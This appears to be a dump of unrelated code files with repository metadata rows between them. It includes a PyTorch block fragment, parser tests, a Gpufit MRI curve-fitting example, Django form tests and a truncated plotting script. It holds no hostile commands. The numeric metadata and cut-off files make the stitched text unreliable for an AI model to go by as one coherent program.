self.layers.append(
BasicBlock(
inplanes,
planes,
groups=groups,
base_width=base_width,
dilation=dilation,
norm_cfg=norm_cfg,
plug_cfg=plug_cfg))
def forward(self, x):
for layer in self.layers:
x = layer(x)
return x
@UTILS.register_module
class Bottlenecks(nn.Module):
def __init__(
self,
inplanes,
planes,
stride=1,
downsample=None,
groups=1,
base_width=64,
dilation=1,
avg_down=False,
norm_cfg=None,
plug_cfg=None,
blocks=1,
):
super().__init__()
self.layers = nn.ModuleList()
self.layers.append(
Bottleneck(inplanes, planes, stride, downsample, groups,
base_width, dilation, avg_down, norm_cfg, plug_cfg))
inplanes = Bottleneck.expansion * planes
for i in range(blocks - 1):
self.layers.append(
BasicBlock(
inplanes,
planes,
groups=groups,
base_width=base_width,
dilation=dilation,
norm_cfg=norm_cfg,
plug_cfg=plug_cfg))
def forward(self, x):
for layer in self.layers:
x = layer(x)
return x
| 28.414414
| 78
| 0.516011
| 652
| 6,308
| 4.819018
| 0.119632
| 0.037874
| 0.028644
| 0.022279
| 0.888288
| 0.856779
| 0.853596
| 0.844367
| 0.844367
| 0.844367
| 0
| 0.013231
| 0.400919
| 6,308
| 221
| 79
| 28.542986
| 0.818206
| 0
| 0
| 0.851852
| 0
| 0
| 0.000634
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042328
| false
| 0
| 0.042328
| 0
| 0.126984
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
754125dcd4b3719182414874c80ef2a81b9df8da
| 3,518
|
py
|
Python
|
tests/test_parser.py
|
zzxuanyuan/osgparse
|
f894729f159c7f06dcbe14f7c70889a19db3fcb9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_parser.py
|
zzxuanyuan/osgparse
|
f894729f159c7f06dcbe14f7c70889a19db3fcb9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_parser.py
|
zzxuanyuan/osgparse
|
f894729f159c7f06dcbe14f7c70889a19db3fcb9
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import pytest
import filecmp
from cStringIO import StringIO
import osgparse
import osgparse.parser
import osgparse.constants
def test_parser_read_single_item():
osgparse.constants.init()
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = dir_path + "/data/single_item"
tmp_path = dir_path + "/files/result_single_item.ini"
with open(file_path, "r") as f:
line = f.read()
parser = osgparse.parser.Parser()
snapshot = parser.read_line(line)
old_stdout = sys.stdout
sys.stdout = tmpstdout = StringIO()
snapshot.sorted_dump()
sys.stdout = old_stdout
with open(tmp_path, "w") as o:
o.write(tmpstdout.getvalue())
expect_path = dir_path + "/files/expected_single_item.ini"
assert filecmp.cmp(tmp_path,expect_path)
os.remove(tmp_path)
def test_parser_read_two_diff_items():
osgparse.constants.init()
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = dir_path + "/data/two_diff_items"
tmp_path = dir_path + "/files/result_two_diff_items.ini"
with open(file_path, "r") as f:
line = f.read()
parser = osgparse.parser.Parser()
snapshot = parser.read_line(line)
old_stdout = sys.stdout
sys.stdout = tmpstdout = StringIO()
snapshot.sorted_dump()
sys.stdout = old_stdout
with open(tmp_path, "w") as o:
o.write(tmpstdout.getvalue())
expect_path = dir_path + "/files/expected_two_diff_items.ini"
assert filecmp.cmp(tmp_path,expect_path)
os.remove(tmp_path)
def test_parser_read_four_diff_items():
osgparse.constants.init()
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = dir_path + "/data/four_diff_items"
tmp_path = dir_path + "/files/result_four_diff_items.ini"
with open(file_path, "r") as f:
line = f.read()
parser = osgparse.parser.Parser()
snapshot = parser.read_line(line)
old_stdout = sys.stdout
sys.stdout = tmpstdout = StringIO()
snapshot.sorted_dump()
sys.stdout = old_stdout
with open(tmp_path, "w") as o:
o.write(tmpstdout.getvalue())
expect_path = dir_path + "/files/expected_four_diff_items.ini"
assert filecmp.cmp(tmp_path,expect_path)
os.remove(tmp_path)
def test_parser_read_three_same_items():
osgparse.constants.init()
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = dir_path + "/data/three_same_items"
tmp_path = dir_path + "/files/result_three_same_items.ini"
with open(file_path, "r") as f:
line = f.read()
parser = osgparse.parser.Parser()
snapshot = parser.read_line(line)
old_stdout = sys.stdout
sys.stdout = tmpstdout = StringIO()
snapshot.sorted_dump()
sys.stdout = old_stdout
with open(tmp_path, "w") as o:
o.write(tmpstdout.getvalue())
expect_path = dir_path + "/files/expected_three_same_items.ini"
assert filecmp.cmp(tmp_path,expect_path)
os.remove(tmp_path)
def test_parser_read_two_same_items_but_diff_resources():
osgparse.constants.init()
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = dir_path + "/data/three_same_items_but_diff_resources"
tmp_path = dir_path + "/files/result_three_same_items_but_diff_resources.ini"
with open(file_path, "r") as f:
line = f.read()
parser = osgparse.parser.Parser()
snapshot = parser.read_line(line)
old_stdout = sys.stdout
sys.stdout = tmpstdout = StringIO()
snapshot.sorted_dump()
sys.stdout = old_stdout
with open(tmp_path, "w") as o:
o.write(tmpstdout.getvalue())
expect_path = dir_path + "/files/expected_three_same_items_but_diff_resources.ini"
assert filecmp.cmp(tmp_path,expect_path)
os.remove(tmp_path)
| 30.327586
| 83
| 0.755543
| 546
| 3,518
| 4.551282
| 0.108059
| 0.056338
| 0.066398
| 0.064386
| 0.908652
| 0.898592
| 0.882093
| 0.869215
| 0.841851
| 0.812475
| 0
| 0.000323
| 0.119102
| 3,518
| 115
| 84
| 30.591304
| 0.801549
| 0.005969
| 0
| 0.714286
| 0
| 0
| 0.143961
| 0.130509
| 0
| 0
| 0
| 0
| 0.05102
| 1
| 0.05102
| false
| 0
| 0.081633
| 0
| 0.132653
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7557106ff0f9a60d5f80521812691e306a722b03
| 82
|
py
|
Python
|
standard_lib/list_unpacking.py
|
DahlitzFlorian/python-snippets
|
212f63f820b6f5842f74913ed08da18d41dfe7a4
|
[
"MIT"
] | 29
|
2019-03-25T09:35:12.000Z
|
2022-01-08T22:09:03.000Z
|
standard_lib/list_unpacking.py
|
DahlitzFlorian/python-snippets
|
212f63f820b6f5842f74913ed08da18d41dfe7a4
|
[
"MIT"
] | null | null | null |
standard_lib/list_unpacking.py
|
DahlitzFlorian/python-snippets
|
212f63f820b6f5842f74913ed08da18d41dfe7a4
|
[
"MIT"
] | 4
|
2020-05-19T21:18:12.000Z
|
2021-05-18T12:49:21.000Z
|
a, *b, c = [1, 2, 3, 4, 5]
print(f"a = {a}")
print(f"b = {b}")
print(f"c = {c}")
| 13.666667
| 26
| 0.390244
| 20
| 82
| 1.6
| 0.5
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079365
| 0.231707
| 82
| 5
| 27
| 16.4
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0.256098
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
f33f495fb4f8a07a8350c2e92227cdc595b99f52
| 22
|
py
|
Python
|
array_analyzer/extract/__init__.py
|
mehta-lab/pysero
|
c8dbdc8c98c134dd9647e691bc92eaef4301effa
|
[
"MIT"
] | 6
|
2020-05-12T22:07:15.000Z
|
2020-10-31T21:23:04.000Z
|
array_analyzer/extract/__init__.py
|
mehta-lab/pysero
|
c8dbdc8c98c134dd9647e691bc92eaef4301effa
|
[
"MIT"
] | 39
|
2020-04-26T02:22:29.000Z
|
2021-09-17T17:59:58.000Z
|
array_analyzer/extract/__init__.py
|
mehta-lab/pysero
|
c8dbdc8c98c134dd9647e691bc92eaef4301effa
|
[
"MIT"
] | 3
|
2020-05-06T14:15:59.000Z
|
2021-07-21T04:28:39.000Z
|
# bchhun, {2020-03-23}
| 22
| 22
| 0.636364
| 4
| 22
| 3.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 0.090909
| 22
| 1
| 22
| 22
| 0.3
| 0.909091
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
340f11c2756a0d7083acdfbc139f28f78005d03c
| 11,011
|
py
|
Python
|
Gpufit/python/examples/pyDixon_Timing.py
|
ironictoo/Gpufit
|
a2d72b8f676b20b5fea91b5e61562e8fa6b34048
|
[
"MIT"
] | 1
|
2019-08-22T06:46:58.000Z
|
2019-08-22T06:46:58.000Z
|
Gpufit/python/examples/pyDixon_Timing.py
|
lsaca05/Gpufit
|
735e1be542fb3d1e1732c9a9955eab6e634dc904
|
[
"MIT"
] | null | null | null |
Gpufit/python/examples/pyDixon_Timing.py
|
lsaca05/Gpufit
|
735e1be542fb3d1e1732c9a9955eab6e634dc904
|
[
"MIT"
] | 2
|
2019-10-13T20:24:03.000Z
|
2021-06-15T00:52:34.000Z
|
"""
Example of the Python binding of the Gpufit library which implements
Levenberg Marquardt curve fitting in CUDA
https://github.com/gpufit/Gpufit
"""
import numpy as np
import matplotlib.pyplot as plt
import pygpufit.gpufit as gf
import cmath
if __name__ == '__main__':
Model_id_pick = input("select a method (3 or 4): ")
if Model_id_pick == "3":
# cuda available checks
print('CUDA available: {}'.format(gf.cuda_available()))
if not gf.cuda_available():
raise RuntimeError(gf.get_last_error())
print('CUDA versions runtime: {}, driver: {}'.format(*gf.get_cuda_version()))
#Signal to Noise Ratio
snr = 50
# number of fits and fit points
number_fits = 100
number_points = 6
number_parameters = 3
# Echo Times
TEn = np.array((1.23, 2.48, 3.65, 4.84, 6.03, 7.22), dtype=np.float32)
# User_info set up
#user_info = TEn
# set input arguments
# true parameters
true_parameters = np.array((210, 20, 0.1), dtype=np.float32)
sigma = (true_parameters[0] + true_parameters[1]) / snr
# initialize random number generator
np.random.seed(0)
initial_parameters = np.zeros((number_fits,number_parameters), dtype=np.float32)#np.tile(true_parameters, (number_fits, 1))
for n in range (0, number_fits):
#initial parameters
initial_parameters[n,0] = true_parameters[0] * (0.5 + 1 * np.random.uniform())
initial_parameters[n,1] = true_parameters[1] * (0.5 + 1 * np.random.uniform())
initial_parameters[n,2] = true_parameters[2] * (0.5 + 1 * np.random.uniform())
#print("initial guess 0 ", initial_parameters[n, 0])
#print("initial guess 1 ", initial_parameters[n, 1])
#print("initial guess 2 ", initial_parameters[n, 2], "\n")
#print(initial_parameters.shape)
# Creating complex number
ppm_list=[-0.4764702, -0.4253742, -0.3883296, -0.332124, -0.3040212, -0.2375964, 0.0868632]
i=complex(0,1)
C_n = 0
weight_list=[0.08,0.63,0.07,0.09,0.07,0.02,0.04]
# generating data
data = np.zeros((100,6), dtype=np.float32)
for l in range(0, number_fits):
for m in range(0, number_points):
#k = l % number_points
C_n = 0
for n in range(0, 7):
C_n += weight_list[n] * np.exp(i * 2 * cmath.pi * ppm_list[n] * TEn[m])
y = abs((true_parameters[0] + C_n * true_parameters[1]) * np.exp(-1 * true_parameters[2] * TEn[m]))
rician_noise = cmath.sqrt(np.random.normal(0,sigma) ** 2 + np.random.normal(0,sigma) ** 2)
data[l,m] = (abs(y + rician_noise))
if l==number_fits-1:
print("y ", y)
print("rician noise ", rician_noise)
print("y with noise ", data[l,m])
print()
# use this to check how data is being collected
signal = np.mean(data[:,0])
noise = np.std(data[:,0])
SNR_actual = signal/noise
#print(data)
#print(data.shape)
print("input SNR ",snr)
print("actual SNR ", SNR_actual)
# tolerance
tolerance = 10e-3
# maximum number of iterations
max_number_iterations = 200
# model ID
model_id = gf.ModelID.LIVER_FAT_THREE
# run Gpufit
parameters, states, chi_squares, number_iterations, execution_time = gf.fit(data, None, model_id, initial_parameters, \
tolerance, max_number_iterations, None, None, TEn)
# print fit results
converged = states == 0
print('\n\n*Gpufit*')
# checking how parameters are made
print('\n\nParameters\n', parameters)
# print summary
print('\nmodel ID: {}'.format(model_id))
print('number of fits: {}'.format(number_fits))
# print('fit size: {} x {}'.format(size_x, size_x))
print('mean chi_square: {:.2f}'.format(np.mean(chi_squares[converged])))
print('iterations: {:.2f}'.format(np.mean(number_iterations[converged])))
print('time: {:.2f} s'.format(execution_time))
# get fit states
number_converged = np.sum(converged)
print('\nratio converged {:6.2f} %'.format(number_converged / number_fits * 100))
print('ratio max it. exceeded {:6.2f} %'.format(np.sum(states == 1) / number_fits * 100))
print('ratio singular hessian {:6.2f} %'.format(np.sum(states == 2) / number_fits * 100))
print('ratio neg curvature MLE {:6.2f} %'.format(np.sum(states == 3) / number_fits * 100))
# mean, std of fitted parameters
converged_parameters = parameters[converged, :]
converged_parameters_mean = np.mean(converged_parameters, axis=0)
converged_parameters_std = np.std(converged_parameters, axis=0)
print('\nparameters of Liver Fat 3')
for i in range(number_parameters):
print('p{} true {:6.2f} mean {:6.2f} std {:6.2f}'.format(i, true_parameters[i], converged_parameters_mean[i], converged_parameters_std[i]))
#########################################################################################################################
if Model_id_pick == "4":
# cuda available checks
print('CUDA available: {}'.format(gf.cuda_available()))
if not gf.cuda_available():
raise RuntimeError(gf.get_last_error())
print('CUDA versions runtime: {}, driver: {}'.format(*gf.get_cuda_version()))
#Signal to Noise Ratio
snr = 50
# number of fits and fit points
number_fits = 100
number_points = 6
number_parameters = 4
# Echo Times
TEn = np.array((1.23, 2.48, 3.65, 4.84, 6.03, 7.22), dtype=np.float32)
# User_info set up
#user_info = TEn
# set input arguments
# true parameters
true_parameters = np.array((290.21, 44.11, 0.05, 0.11), dtype=np.float32)
sigma = (true_parameters[0] + true_parameters[1]) / snr
# initialize random number generator
np.random.seed(0)
initial_parameters = np.zeros((number_fits,number_parameters), dtype=np.float32)#np.tile(true_parameters, (number_fits, 1))
for n in range (0, number_fits):
#initial parameters
initial_parameters[n,0] = true_parameters[0] * (0.5 + 1 * np.random.uniform())
initial_parameters[n,1] = true_parameters[1] * (0.5 + 1 * np.random.uniform())
initial_parameters[n,2] = true_parameters[2] * (0.5 + 1 * np.random.uniform())
initial_parameters[n,3] = true_parameters[3] * (0.5 + 1 * np.random.uniform())
#print("initial guess 0 ", initial_parameters[n, 0])
#print("initial guess 1 ", initial_parameters[n, 1])
#print("initial guess 2 ", initial_parameters[n, 2], "\n")
#print(initial_parameters.shape)
# Creating complex number
ppm_list=[-0.4764702, -0.4253742, -0.3883296, -0.332124, -0.3040212, -0.2375964, 0.0868632]
i=complex(0,1)
C_n = 0
weight_list=[0.08,0.63,0.07,0.09,0.07,0.02,0.04]
# generating data
data = np.zeros((100,6), dtype=np.float32)
for l in range(0, number_fits):
for m in range(0, number_points):
#k = l % number_points
C_n = 0
for n in range(0, 7):
C_n += weight_list[n] * np.exp(i * 2 * cmath.pi * ppm_list[n] * TEn[m])
y = abs(true_parameters[0] * np.exp(-1 * true_parameters[2] * TEn[m]) + C_n * true_parameters[1]* np.exp(-1 * true_parameters[3] * TEn[m]))
rician_noise = cmath.sqrt(np.random.normal(0,sigma) ** 2 + np.random.normal(0,sigma) ** 2)
data[l,m] = (abs(y + rician_noise))
if l==number_fits-1:
print("y ", y)
print("rician noise ", rician_noise)
print("y with noise ", data[l,m])
print()
# use this to check how data is being collected
signal = np.mean(data[:,0])
noise = np.std(data[:,0])
SNR_actual = signal/noise
#print(data)
#print(data.shape)
print("input SNR ",snr)
print("actual SNR ", SNR_actual)
# tolerance
tolerance = 10e-5
# maximum number of iterations
max_number_iterations = 200
# model ID
model_id = gf.ModelID.LIVER_FAT_FOUR
# run Gpufit
parameters, states, chi_squares, number_iterations, execution_time = gf.fit(data, None, model_id, initial_parameters, \
tolerance, max_number_iterations, None, None, TEn)
# print fit results
converged = states == 0
print('\n\n*Gpufit*')
# checking how parameters are made
print('\n\nParameters\n', parameters)
# print summary
print('\nmodel ID: {}'.format(model_id))
print('number of fits: {}'.format(number_fits))
print('mean chi_square: {:.2f}'.format(np.mean(chi_squares[converged])))
print('iterations: {:.2f}'.format(np.mean(number_iterations[converged])))
print('time: {:.2f} s'.format(execution_time))
# get fit states
number_converged = np.sum(converged)
print('\nratio converged {:6.2f} %'.format(number_converged / number_fits * 100))
print('ratio max it. exceeded {:6.2f} %'.format(np.sum(states == 1) / number_fits * 100))
print('ratio singular hessian {:6.2f} %'.format(np.sum(states == 2) / number_fits * 100))
print('ratio neg curvature MLE {:6.2f} %'.format(np.sum(states == 3) / number_fits * 100))
# mean, std of fitted parameters
converged_parameters = parameters[converged, :]
converged_parameters_mean = np.mean(converged_parameters, axis=0)
converged_parameters_std = np.std(converged_parameters, axis=0)
print('\nparameters of Liver Fat 4')
for i in range(number_parameters):
print('p{} true {:6.2f} mean {:6.2f} std {:6.2f}'.format(i, true_parameters[i], converged_parameters_mean[i], converged_parameters_std[i]))
else:
print("ending program now")
| 41.708333
| 156
| 0.545727
| 1,368
| 11,011
| 4.251462
| 0.148392
| 0.062586
| 0.040234
| 0.006018
| 0.93621
| 0.93621
| 0.93621
| 0.93621
| 0.93174
| 0.928645
| 0
| 0.057823
| 0.316774
| 11,011
| 264
| 157
| 41.708333
| 0.715273
| 0.1543
| 0
| 0.834532
| 0
| 0
| 0.106037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028777
| 0
| 0.028777
| 0.309353
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
341b337b6e5c1019e4d21be528937dccafdb261a
| 5,323
|
py
|
Python
|
investment_atlas/tests/test_forms.py
|
froddd/great-international-ui
|
414bcb09d701cd7e0c5748d1ac8c587d704f92da
|
[
"MIT"
] | 1
|
2019-03-22T09:45:00.000Z
|
2019-03-22T09:45:00.000Z
|
investment_atlas/tests/test_forms.py
|
froddd/great-international-ui
|
414bcb09d701cd7e0c5748d1ac8c587d704f92da
|
[
"MIT"
] | 556
|
2019-01-31T15:31:05.000Z
|
2022-03-24T09:44:26.000Z
|
investment_atlas/tests/test_forms.py
|
froddd/great-international-ui
|
414bcb09d701cd7e0c5748d1ac8c587d704f92da
|
[
"MIT"
] | 6
|
2019-03-07T12:57:49.000Z
|
2021-11-02T15:23:51.000Z
|
from directory_constants import choices
from investment_atlas import forms
from investment_atlas.forms import HOW_CAN_WE_HELP_CHOICES, HOW_DID_YOU_HEAR_CHOICES
def test_high_potential_opportunity_form_serialize_data(captcha_stub):
form = forms.ForeignDirectInvestmentOpportunityForm(
data={
'given_name': 'Jim',
'family_name': 'Example',
'job_title': 'Chief chief',
'email_address': 'test@example.com',
'phone_number': '555',
'company_name': 'Example corp',
'website_url': 'example.com',
'company_address': '123 Some Street, \nSome town, \nSomewhere, \nNarnia',
'country': choices.COUNTRY_CHOICES[1][0],
'industry': [choices.INDUSTRIES[0][0]],
'opportunities': [
'http://www.e.com/a',
'http://www.e.com/b',
],
'how_can_we_help': HOW_CAN_WE_HELP_CHOICES[0][0],
'your_plans': 'Lorem ipsum dolor sit amet',
'how_did_you_hear': HOW_DID_YOU_HEAR_CHOICES[0][0],
'email_contact_consent': True,
'telephone_contact_consent': True,
'g-recaptcha-response': captcha_stub,
},
opportunity_choices=[
('http://www.e.com/a', 'some great opportunity'),
('http://www.e.com/b', 'some other great opportunity'),
],
utm_data={
'utm_source': 'test_source',
'utm_medium': 'test_medium',
'utm_campaign': 'test_campaign',
'utm_term': 'test_term',
'utm_content': 'test_content'
}
)
assert form.is_valid()
assert form.serialized_data == {
'given_name': 'Jim',
'family_name': 'Example',
'job_title': 'Chief chief',
'email_address': 'test@example.com',
'phone_number': '555',
'captcha': 'PASSED',
'company_name': 'Example corp',
'website_url': 'example.com',
'company_address': '123 Some Street, \nSome town, \nSomewhere, \nNarnia',
'country': choices.COUNTRY_CHOICES[1][0],
'industry': [choices.INDUSTRIES[0][0]],
'opportunities': [
'http://www.e.com/a',
'http://www.e.com/b',
],
'opportunity_urls': (
'• some great opportunity: http://www.e.com/a\n'
'• some other great opportunity: http://www.e.com/b'
),
'how_can_we_help': HOW_CAN_WE_HELP_CHOICES[0][0],
'your_plans': 'Lorem ipsum dolor sit amet',
'how_did_you_hear': HOW_DID_YOU_HEAR_CHOICES[0][0],
'email_contact_consent': True,
'telephone_contact_consent': True,
'utm_source': 'test_source',
'utm_medium': 'test_medium',
'utm_campaign': 'test_campaign',
'utm_term': 'test_term',
'utm_content': 'test_content'
}
def test_hpo_form_serialize_data_without_utm_data(captcha_stub):
form = forms.ForeignDirectInvestmentOpportunityForm(
data={
'given_name': 'Jim',
'family_name': 'Example',
'job_title': 'Chief chief',
'email_address': 'test@example.com',
'phone_number': '555',
'company_name': 'Example corp',
'website_url': 'example.com',
'company_address': '123 Some Street, \nSome town, \nSomewhere, \nNarnia',
'country': choices.COUNTRY_CHOICES[1][0],
'industry': [choices.INDUSTRIES[0][0]],
'opportunities': [
'http://www.e.com/a',
'http://www.e.com/b',
],
'how_can_we_help': HOW_CAN_WE_HELP_CHOICES[0][0],
'your_plans': 'Lorem ipsum dolor sit amet',
'how_did_you_hear': HOW_DID_YOU_HEAR_CHOICES[0][0],
'email_contact_consent': True,
'telephone_contact_consent': True,
'g-recaptcha-response': captcha_stub,
},
opportunity_choices=[
('http://www.e.com/a', 'some great opportunity'),
('http://www.e.com/b', 'some other great opportunity'),
],
)
assert form.is_valid()
assert form.serialized_data == {
'given_name': 'Jim',
'family_name': 'Example',
'job_title': 'Chief chief',
'email_address': 'test@example.com',
'phone_number': '555',
'captcha': 'PASSED',
'company_name': 'Example corp',
'website_url': 'example.com',
'company_address': '123 Some Street, \nSome town, \nSomewhere, \nNarnia',
'country': choices.COUNTRY_CHOICES[1][0],
'industry': [choices.INDUSTRIES[0][0]],
'opportunities': [
'http://www.e.com/a',
'http://www.e.com/b',
],
'opportunity_urls': (
'• some great opportunity: http://www.e.com/a\n'
'• some other great opportunity: http://www.e.com/b'
),
'how_can_we_help': HOW_CAN_WE_HELP_CHOICES[0][0],
'your_plans': 'Lorem ipsum dolor sit amet',
'how_did_you_hear': HOW_DID_YOU_HEAR_CHOICES[0][0],
'email_contact_consent': True,
'telephone_contact_consent': True,
'utm_source': '',
'utm_medium': '',
'utm_campaign': '',
'utm_term': '',
'utm_content': '',
}
| 38.021429
| 85
| 0.559459
| 594
| 5,323
| 4.727273
| 0.158249
| 0.039886
| 0.045584
| 0.062678
| 0.921652
| 0.907764
| 0.907764
| 0.907764
| 0.907764
| 0.907764
| 0
| 0.014834
| 0.290813
| 5,323
| 139
| 86
| 38.294964
| 0.727947
| 0
| 0
| 0.863636
| 0
| 0
| 0.425136
| 0.034567
| 0
| 0
| 0
| 0
| 0.030303
| 1
| 0.015152
| false
| 0.015152
| 0.022727
| 0
| 0.037879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
345516148863c822bd9705322b6cdd3f37e687c5
| 167
|
py
|
Python
|
script/lib/config.py
|
Smyled/libchromiumcontent-master
|
97331aff08ce10ce0dbde034af622b8b8e8432b9
|
[
"MIT"
] | null | null | null |
script/lib/config.py
|
Smyled/libchromiumcontent-master
|
97331aff08ce10ce0dbde034af622b8b8e8432b9
|
[
"MIT"
] | null | null | null |
script/lib/config.py
|
Smyled/libchromiumcontent-master
|
97331aff08ce10ce0dbde034af622b8b8e8432b9
|
[
"MIT"
] | 2
|
2019-09-05T03:27:45.000Z
|
2019-10-03T13:02:48.000Z
|
#!/usr/bin/env python
import os
def get_output_dir(source_root, target_arch, component):
return os.path.join(source_root, 'src', 'out-' + target_arch, component)
| 20.875
| 74
| 0.742515
| 26
| 167
| 4.538462
| 0.769231
| 0.169492
| 0.322034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11976
| 167
| 7
| 75
| 23.857143
| 0.802721
| 0.11976
| 0
| 0
| 0
| 0
| 0.047945
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
cafc040dadb6c88be8e887d41862956d8d48843b
| 6,269
|
py
|
Python
|
evaluation/plot_bce_graph.py
|
deanzadok/finemotions
|
273991faf45efe8d236727bdfccb08cc0c69bed4
|
[
"MIT"
] | null | null | null |
evaluation/plot_bce_graph.py
|
deanzadok/finemotions
|
273991faf45efe8d236727bdfccb08cc0c69bed4
|
[
"MIT"
] | null | null | null |
evaluation/plot_bce_graph.py
|
deanzadok/finemotions
|
273991faf45efe8d236727bdfccb08cc0c69bed4
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams.update({'font.size': 12})
METHODS_NAMES = ['SF', 'MF', 'CBMF']
NUM_EPOCHS = 20
NUM_EXPS = 5
GRAPH_FORMAT = 'png'
# GRAPH_TITLE = 'Piano Playing'
# GRAPH_FILE = 'piano_playing'
GRAPH_TITLE = 'Keyboard Typing'
GRAPH_FILE = 'keyboard_typing'
if GRAPH_FILE == 'piano_playing':
methods_folders = [['/mnt/walkure_public/deanz/models/deepnet/us2multimidi_all/deepnetunet_224res_1imgs_calib_all_multiplaying_01_st0.8_kf4',
'/mnt/walkure_public/deanz/models/deepnet/us2multimidi_all/deepnetunet_224res_1imgs_calib_all_multiplaying_02_st0.8_kf0',
'/mnt/walkure_public/deanz/models/deepnet/us2multimidi_all/deepnetunet_224res_1imgs_calib_all_multiplaying_03_st0.8_kf1',
'/mnt/walkure_public/deanz/models/deepnet/us2multimidi_all/deepnetunet_224res_1imgs_calib_all_multiplaying_04_st0.8_kf2',
'/mnt/walkure_public/deanz/models/deepnet/us2multimidi_all/deepnetunet_224res_1imgs_calib_all_multiplaying_05_st0.8_kf3'],
['/mnt/walkure_public/deanz/models/mfm/us2multimidi_all/mfmunet_224res_8imgs_calib_all_multiplaying_03_st0.8_sequence_kf4',
'/mnt/walkure_public/deanz/models/mfm/us2multimidi_all/mfmunet_224res_8imgs_calib_all_multiplaying_04_st0.8_sequence_kf1',
'/mnt/walkure_public/deanz/models/mfm/us2multimidi_all/mfmunet_224res_8imgs_calib_all_multiplaying_05_st0.8_sequence_kf0',
'/mnt/walkure_public/deanz/models/mfm/us2multimidi_all/mfmunet_224res_8imgs_calib_all_multiplaying_06_st0.8_sequence_kf2',
'/mnt/walkure_public/deanz/models/mfm/us2multimidi_all/mfmunet_224res_8imgs_calib_all_multiplaying_07_st0.8_sequence_kf3'],
['/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_13_st0.8_sequence_reslayer_retrained_mp_4qloss_kf4',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_14_st0.8_sequence_reslayer_retrained_mp_4qloss_kf0',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_15_st0.8_sequence_reslayer_retrained_mp_4qloss_kf1',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_16_st0.8_sequence_reslayer_retrained_mp_4qloss_kf2',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_17_st0.8_sequence_reslayer_retrained_mp_4qloss_kf3']]
else:
methods_folders = [['/mnt/walkure_public/deanz/models/deepnet/us2multikey_all/deepnetunet_224res_1imgs_calib_all_multityping_01_st0.8_kf4',
'/mnt/walkure_public/deanz/models/deepnet/us2multikey_all/deepnetunet_224res_1imgs_calib_all_multityping_02_st0.8_kf0',
'/mnt/walkure_public/deanz/models/deepnet/us2multikey_all/deepnetunet_224res_1imgs_calib_all_multityping_03_st0.8_kf1',
'/mnt/walkure_public/deanz/models/deepnet/us2multikey_all/deepnetunet_224res_1imgs_calib_all_multityping_04_st0.8_kf2',
